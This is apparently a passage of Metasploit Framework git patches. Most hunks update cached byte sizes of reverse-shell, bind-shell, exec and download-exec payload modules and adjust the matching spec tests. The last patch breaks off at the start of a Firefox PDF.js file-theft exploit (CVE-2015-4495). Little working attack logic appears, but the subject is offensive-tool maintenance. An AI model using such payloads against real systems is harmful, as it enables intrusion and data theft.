index 2ed64a33c6..6d240561fa 100644
--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 0
+  CachedSize = 184
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index 430527ecf7..69630f74bf 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 40
+  CachedSize = 47
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
@@ -29,7 +29,7 @@ module Metasploit3
   end
 
   def generate_stage(opts={})
-    cmd = (datastore['CMD'] || '') << "\x00"
+    cmd = (datastore['CMD'] || '') + "\x00"
     call = "\xe8" + [cmd.length].pack('V')
     payload =
       "\x6a\x3b"                     + # pushq  $0x3b
diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb
index dcb8d3ce25..d81ac237ad 100644
--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -15,7 +15,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 36
+  CachedSize = 43
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb
index 1a6ce1819b..6d9a0a9b89 100644
--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 62
+  CachedSize = 63
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
index 5a41ddfae5..d31c4ccc7c 100644
--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 103
+  CachedSize = 70
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
index 18fc91ca73..b7cf44698d 100644
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@@ -14,7 +14,7 @@ require 'msf/base/sessions/command_shell'
 
 module Metasploit3
 
-  CachedSize = 473
+  CachedSize = 488
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
index bd0c7e907d..140ccdfa85 100644
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 501
+  CachedSize = 516
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb
index 10610e01e1..126b9b4433 100644
--- a/modules/payloads/singles/osx/x64/exec.rb
+++ b/modules/payloads/singles/osx/x64/exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 23
+  CachedSize = 31
 
   include Msf::Payload::Single
 
diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
index 39c243a804..246bbcc2b2 100644
--- a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
@@ -37,7 +37,7 @@ module Metasploit3
 
   # build the shellcode payload dynamically based on the user-provided CMD
   def generate
-    cmd  = (datastore['CMD'] || '') << "\x00"
+    cmd  = (datastore['CMD'] || '') + "\x00"
     port = [datastore['LPORT'].to_i].pack('n')
     call = "\xe8" + [cmd.length].pack('V')
     payload =
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
index cea9453ba5..e10354938a 100644
--- a/modules/payloads/singles/osx/x64/shell_find_tag.rb
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -40,7 +40,7 @@ module Metasploit3
   # ensures the setting of tag to a four byte value
   #
   def generate
-    cmd  = (datastore['CMD'] || '') << "\x00"
+    cmd  = (datastore['CMD'] || '') + "\x00"
     call = "\xe8" + [cmd.length].pack('V')
 
     payload =
diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
index 2326540c1c..13e4586d5b 100644
--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -45,7 +45,7 @@ module Metasploit3
       raise ArgumentError, "LHOST must be in IPv4 format."
     end
 
-    cmd  = (datastore['CMD'] || '') << "\x00"
+    cmd  = (datastore['CMD'] || '') + "\x00"
     port = [datastore['LPORT'].to_i].pack('n')
     ipaddr = [lhost.split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")
 
diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb
index 7756c8f420..688f654fb0 100644
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -16,7 +16,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 16
+  CachedSize = 24
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd::X86
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index b7b94c4cc3..1a1c56d38b 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit4
 
-  CachedSize = 25679
+  CachedSize = 25685
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
index d0da258362..2a7ceb923f 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 381
+  CachedSize = 401
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
index e450654e55..c3e6eb0765 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 537
+  CachedSize = 557
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
index 723ee36cbc..72db7766bd 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 496
+  CachedSize = 516
 
   include Msf::Payload::Single
   include Msf::Payload::Ruby
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
index 5801918b6c..0f16cba516 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 424
+  CachedSize = 444
 
   include Msf::Payload::Single
   include Msf::Payload::Ruby
diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
index 66c045ca31..6027131f48 100644
--- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = :dynamic
+  CachedSize = 136
 
   include Msf::Payload::Single
   include Msf::Payload::Solaris
diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
index b131313de5..f90d730769 100644
--- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 160
+  CachedSize = 95
 
   include Msf::Payload::Single
   include Msf::Payload::Solaris
diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb
index 47685dc019..63f6835cfc 100644
--- a/modules/payloads/singles/solaris/x86/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 151
+  CachedSize = 86
 
   include Msf::Payload::Single
   include Msf::Payload::Solaris
diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
index e30f986522..8263e301da 100644
--- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 156
+  CachedSize = 91
 
   include Msf::Payload::Single
   include Msf::Payload::Solaris
diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb
index bac5858201..ce3d1fd43c 100644
--- a/modules/payloads/singles/windows/adduser.rb
+++ b/modules/payloads/singles/windows/adduser.rb
@@ -15,7 +15,7 @@ require 'msf/core/payload/windows/exec'
 ###
 module Metasploit3
 
-  CachedSize = 443
+  CachedSize = 282
 
   include Msf::Payload::Windows::Exec
 
diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb
index db3d09cffb..dcb1415381 100644
--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 275
+  CachedSize = 285
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb
index d161b4384f..3ecde4535b 100644
--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 439
+  CachedSize = 423
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb
index 1e88f03eb3..436c0c3dfe 100644
--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -13,7 +13,7 @@ require 'msf/core/payload/windows/exec'
 ###
 module Metasploit3
 
-  CachedSize = 185
+  CachedSize = 192
 
   include Msf::Payload::Windows::Exec
 
diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb
index efcf3c1b11..e0072623c0 100644
--- a/modules/payloads/singles/windows/loadlibrary.rb
+++ b/modules/payloads/singles/windows/loadlibrary.rb
@@ -13,7 +13,7 @@ require 'msf/core/payload/windows/loadlibrary'
 ###
 module Metasploit3
 
-  CachedSize = 183
+  CachedSize = 230
 
   include Msf::Payload::Windows::LoadLibrary
 
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
index 1042da2ee2..95ef7b26c2 100644
--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 1695
+  CachedSize = 1703
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
index 20d069518b..487c0d8d35 100644
--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module Metasploit3
 
-  CachedSize = 1703
+  CachedSize = 1711
 
   include Msf::Payload::Windows::Exec
   include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb
index 547ca5cfe4..92455a5b9b 100644
--- a/modules/payloads/singles/windows/x64/exec.rb
+++ b/modules/payloads/singles/windows/x64/exec.rb
@@ -9,7 +9,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 268
+  CachedSize = 275
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb
index 2c95b8ee61..f8ee8f6823 100644
--- a/modules/payloads/singles/windows/x64/loadlibrary.rb
+++ b/modules/payloads/singles/windows/x64/loadlibrary.rb
@@ -9,7 +9,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 267
+  CachedSize = 314
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
index 065b8f5685..7b16dad82d 100644
--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 1778
+  CachedSize = 1786
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
index 4db849cd89..524d876cdc 100644
--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module Metasploit3
 
-  CachedSize = 1786
+  CachedSize = 1794
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb
index 8a96ea2837..5871e573df 100644
--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
-  CachedSize = 5499
+  CachedSize = 5505
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb
index 4318ad3f42..2a95173ce7 100644
--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
-  CachedSize = 6307
+  CachedSize = 6313
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb
index 514f8b35aa..5e6284c129 100644
--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 5487
+  CachedSize = 5500
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
index 6e6d4b611b..6127486d9c 100644
--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 193
+  CachedSize = 71
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
index fa08274121..3f0d438f87 100644
--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 236
+  CachedSize = 114
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp
diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb
index 79c4acae90..43a6199879 100644
--- a/modules/payloads/stagers/netware/reverse_tcp.rb
+++ b/modules/payloads/stagers/netware/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module Metasploit3
 
-  CachedSize = 279
+  CachedSize = 281
 
   include Msf::Payload::Stager
   include Msf::Payload::Netware
diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb
index 4fcafa11df..9768010ca5 100644
--- a/modules/payloads/stagers/php/reverse_tcp.rb
+++ b/modules/payloads/stagers/php/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 936
+  CachedSize = 951
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
index 86c152d0d4..e99e44664a 100644
--- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/php/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 1110
+  CachedSize = 1125
 
   include Msf::Payload::Stager
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb
index 75b1a00929..7350a20022 100644
--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 342
+  CachedSize = 362
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp
diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
index ebb0a1d9d5..80b038fdc4 100644
--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 446
+  CachedSize = 466
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index 06d5de4f3e..572d1c282d 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_http'
 
 module Metasploit4
 
-  CachedSize = 312
+  CachedSize = 327
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
index 3ba25412bf..d6f375b31a 100644
--- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
+++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
-  CachedSize = 650
+  CachedSize = 665
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index 879777dbaf..0b35881fd0 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_https'
 
 module Metasploit4
 
-  CachedSize = 332
+  CachedSize = 347
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb
index 500506525a..f9a1e0dbf2 100644
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_https_proxy'
 
 module Metasploit3
 
-  CachedSize = 391
+  CachedSize = 397
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb
index 8b15646f81..4ae5af6697 100644
--- a/modules/payloads/stagers/windows/x64/reverse_http.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_http.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_http'
 
 module Metasploit4
 
-  CachedSize = 486
+  CachedSize = 501
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
index 08117499f4..8e5a2fc1f5 100644
--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_https'
 
 module Metasploit4
 
-  CachedSize = 517
+  CachedSize = 532
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 50b07c1c36..553606f01d 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -863,7 +863,7 @@ describe 'modules/payloads', :content do
                           ancestor_reference_names: [
                               'singles/firefox/exec'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'firefox/exec'
   end
@@ -2320,7 +2320,7 @@ describe 'modules/payloads', :content do
                           ancestor_reference_names: [
                               'singles/solaris/sparc/shell_find_port'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'solaris/sparc/shell_find_port'
   end
@@ -3886,7 +3886,7 @@ describe 'modules/payloads', :content do
                           modules_pathname: modules_pathname,
                           reference_name: 'windows/x64/powershell_reverse_tcp'
   end
-  
+
   context 'windows/x64/shell/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
diff --git a/spec/support/shared/examples/payload_cached_size_is_consistent.rb b/spec/support/shared/examples/payload_cached_size_is_consistent.rb
index e325e038da..0a687994e8 100644
--- a/spec/support/shared/examples/payload_cached_size_is_consistent.rb
+++ b/spec/support/shared/examples/payload_cached_size_is_consistent.rb
@@ -70,6 +70,7 @@
 #   `:ancestor_reference_names`.
 # @return [void]
 shared_examples_for 'payload cached size is consistent' do |options|
+
   options.assert_valid_keys(:ancestor_reference_names, :modules_pathname, :reference_name, :dynamic_size)
 
   ancestor_reference_names = options.fetch(:ancestor_reference_names)
@@ -85,6 +86,30 @@ shared_examples_for 'payload cached size is consistent' do |options|
 
   include_context 'Msf::Simple::Framework#modules loading'
 
+  datastore = {
+  }
+
+  opts = {
+    'Format'      => 'raw',
+    'Options'     => {
+      'CPORT' => 4444,
+      'LPORT' => 4444,
+      'LHOST' => '255.255.255.255',
+      'KHOST' => '255.255.255.255',
+      'AHOST' => '255.255.255.255',
+      'CMD' => '/bin/sh',
+      'URL' => 'http://a.com',
+      'PATH' => '/',
+      'BUNDLE' => 'data/isight.bundle',
+      'DLL' => 'external/source/byakugan/bin/XPSP2/detoured.dll',
+      'RC4PASSWORD' => 'Metasploit',
+      'DNSZONE' => 'corelan.eu',
+      'PEXEC' => '/bin/sh'
+    },
+    'Encoder'     => nil,
+    'DisableNops' => true
+  }
+
   #
   # lets
   #
@@ -111,6 +136,8 @@ shared_examples_for 'payload cached size is consistent' do |options|
       )
     end
 
+    next if reference_name =~ /generic/
+
     if dynamic_size
       it 'is dynamic_size?' do
         pinst = load_and_create_module(
@@ -132,7 +159,7 @@ shared_examples_for 'payload cached size is consistent' do |options|
         )
         expect(pinst.cached_size).to_not(be_nil)
         expect(pinst.dynamic_size?).to be(false)
-        expect(pinst.cached_size).to eq(pinst.size)
+        expect(pinst.cached_size).to eq(pinst.generate_simple(opts).size)
       end
     end
   end
diff --git a/tools/update_payload_cached_sizes.rb b/tools/update_payload_cached_sizes.rb
index 950d519669..1a9d97acaa 100755
--- a/tools/update_payload_cached_sizes.rb
+++ b/tools/update_payload_cached_sizes.rb
@@ -22,8 +22,11 @@ require 'msf/util/payload_cached_size'
 framework = Msf::Simple::Framework.create('DisableDatabase' => true)
 
 framework.payloads.each_module do |name, mod|
-  next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod)
+  next if name =~ /generic/
+  mod_inst = framework.payloads.create(name)
+  #mod_inst.datastore.merge!(framework.datastore)
+  next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod_inst)
   $stdout.puts "[*] Updating the CacheSize for #{mod.file_path}..."
-  Msf::Util::PayloadCachedSize.update_module_cached_size(mod)
+  Msf::Util::PayloadCachedSize.update_module_cached_size(mod_inst)
 end
 

From 66148336e10e3a0f97b08dc2d6e9818ca2d544f5 Mon Sep 17 00:00:00 2001
From: Greg Mikeska <greg_mikeska@rapid7.com>
Date: Fri, 14 Aug 2015 11:48:52 -0500
Subject: [PATCH 0977/1013] Modify tests to resolve false negative MSP-13064

---
 spec/support/shared/examples/msf/db_manager/session.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/spec/support/shared/examples/msf/db_manager/session.rb b/spec/support/shared/examples/msf/db_manager/session.rb
index 1ec814058b..5d2f01bd00 100644
--- a/spec/support/shared/examples/msf/db_manager/session.rb
+++ b/spec/support/shared/examples/msf/db_manager/session.rb
@@ -123,9 +123,15 @@ shared_examples_for 'Msf::DBManager::Session' do
           end
 
           context 'with a match in user_data' do
+            let(:vuln) do
+              FactoryGirl.create(:mdm_vuln,
+                                 name: parent_module_name,
+                                 host: host)
+            end
+
             let(:user_data) do
               {
-                match: FactoryGirl.build(:automatic_exploitation_match),
+                match: FactoryGirl.build(:automatic_exploitation_match, matchable: vuln),
                 match_set: FactoryGirl.build(:automatic_exploitation_match_set),
                 run: FactoryGirl.build(:automatic_exploitation_run, workspace: session_workspace),
               }

From e4cb6872f2a591d7f584fe54f4e216ba2aa14a03 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 14 Aug 2015 12:07:15 -0500
Subject: [PATCH 0978/1013] Add exploit for CVE-2015-4495, Firefox PDF.js

---
 .../gather/firefox_pdfjs_file_theft.rb        | 273 ++++++++++++++++++
 1 file changed, 273 insertions(+)
 create mode 100644 modules/auxiliary/gather/firefox_pdfjs_file_theft.rb

diff --git a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
new file mode 100644
index 0000000000..6d52a81cfa
--- /dev/null
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -0,0 +1,273 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
